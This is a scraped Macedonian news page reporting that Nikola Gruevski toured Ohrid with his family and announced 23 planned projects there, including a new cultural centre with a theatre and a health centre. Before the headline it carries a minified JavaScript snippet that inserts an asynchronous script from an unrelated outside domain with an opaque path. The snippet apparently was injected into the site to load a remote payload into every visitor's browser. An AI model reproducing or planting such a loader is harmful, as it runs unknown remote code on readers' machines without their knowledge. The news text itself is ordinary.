;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); НИКОЛА ГРУЕВСКИ НАЈАВИ НОВИ 23 ПРОЕКТИ ЗА ОХРИД -

НИКОЛА ГРУЕВСКИ НАЈАВИ НОВИ 23 ПРОЕКТИ ЗА ОХРИД

Претседателот на најголемата политичка партија во Македонија – Никола Груевски, заедно со неговото семејтво прошета низ Охридските сокаци и ги посети најатрактивните места во Охрид и охридско.
Тој, во неколку наврати спомна за идните проекти кои се планирани за овој град i кои би се реализирале во најбрз можен период

-“Предвидуваме силен инвестициски бран во Охрид во сите свери на живеење. Тука е новиот културен дом со театарот за кој веќе е избрано идејно решение и следи распишување на тендер за изградба, нов здравствен дом и поголем број други објекти кои и се познати на јавноста, вкупно 23 проекти кои минатата година ги поминавме на влада. Дел од нив се градат, дел се во фаза на подготовка”. – рече Груевски.

poseta grueski ohr

Груевски-посетaohri

Leave a Reply

Your email address will not be published.